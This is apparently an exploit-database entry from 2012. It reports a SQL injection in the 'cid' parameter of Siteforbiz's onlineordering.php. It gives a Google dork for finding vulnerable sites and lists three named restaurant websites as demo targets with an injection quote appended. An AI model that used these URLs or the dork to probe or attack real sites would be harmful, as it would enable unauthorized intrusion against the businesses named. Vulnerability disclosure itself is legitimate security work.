id: 18473
date: 06/07/2012
title: Siteforbiz SQL injection Vulerablity
author: d4v1d
cves: 

# Exploit Title: Siteforbiz SQL injection Vulerablity                  
# Date: 7-Jun-2012
# Author: d4v1d
# Vendor or Software Link: siteforbiz.com
# Version: N.A
# Category:: Webapps
# Google dork: [inurl:onlineordering.php]
# Tested on: [Windows OS]
# Demo site: http://www.bellanapoli49st.com/onlineordering.php?cid=27'
             http://bigbiterestaurant.com/onlineordering.php?cid=17'
             http://www.royalspice.uk.com/onlineordering.php?cid=108'

[Vulnerability]
SQL Injection:-

http://www.siteinfected.com/onlineordering.php?cid=[Code]
#########################################################################



#  0day.today [2023-03-22]  #